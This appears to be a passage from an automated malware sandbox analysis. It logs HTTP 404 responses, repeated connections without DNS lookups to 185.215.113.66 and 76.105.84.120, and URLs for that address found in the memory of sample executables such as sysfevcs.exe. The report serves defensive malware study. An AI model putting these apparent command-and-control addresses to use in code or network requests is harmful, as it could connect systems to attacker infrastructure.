                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:10 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 76.105.84.120
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 76.105.84.120
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 76.105.84.120
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: sysfevcs.exe, sysfevcs.exe, 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmp, 2676917645.exe, 0000000F.00000000.482223797.0000000000412000.00000008.00000001.01000000.00000009.sdmp, sysfevcs.exe, 00000010.00000000.505264541.0000000000412000.00000008.00000001.01000000.0000000A.sdmp, l3Qj8QhTYZ.exe, 2676917645.exe.1.dr, sysfevcs.exe.15.dr, sysfevcs.exe.0.drString found in binary or memory: http://185.215.113.66/
                              Source: sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.295825714.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.294393679.0000000002FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                              Source: sysfevcs.exe, 00000001.00000003.294174080.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.294393679.0000000002FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1N
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1W
                              Source: sysfevcs.exe, 00000001.00000003.296381249.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.297008756.0000000003006000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293763030.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293828490.0000000003006000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293672607.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485423655.0000000003004000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.295825714.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1Z
                              Source: sysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1j
                              Source: sysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1k
